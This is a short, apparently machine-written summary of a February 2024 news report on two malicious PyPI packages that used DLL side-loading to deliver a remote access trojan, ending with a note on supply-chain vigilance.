February 21, 2024 at 04:27AM
Cybersecurity researchers discovered two malicious Python packages on PyPI repository, NP6HelperHttptest and NP6HelperHttper, using DLL side-loading to evade detection by security software. These fake packages aimed to deceive developers into downloading rogue counterparts of legitimate ones. The malicious code included a remote access trojan and was part of a wider campaign targeting software supply chain security.
From the meeting notes dated Feb 20, 2024, it was reported that cybersecurity researchers discovered two malicious packages on the Python Package Index (PyPI) repository, named NP6HelperHttptest and NP6HelperHttper, that exploited a DLL side-loading technique to evade security software detection and run malicious code. The packages, posing as legitimate helper tools from ChapsVision, were downloaded multiple times before being removed.
The analysis revealed that the rogue packages contained a setup.py script to download a vulnerable executable (“ComServer.exe”) and a malicious DLL (“dgdeskband64.dll”) to perform DLL side-loading and execute remote access trojan code. The malicious DLL communicated with an attacker-controlled domain to fetch a GIF file containing Cobalt Strike Beacon shellcode.
The incident suggests a broader campaign involving the distribution of similar vulnerable executables susceptible to DLL side-loading, emphasizing the importance of supply chain security awareness for development organizations using open-source package repositories.
The meeting notes highlighted the critical need for vigilance in the face of supply chain threats, as threat actors may exploit open-source package repositories to impersonate companies and their software products and tools.
The article recommends following the organization on Twitter and LinkedIn for more exclusive content.
Please let me know if there is anything specific that you would like to focus on or any action items resulting from these meeting notes.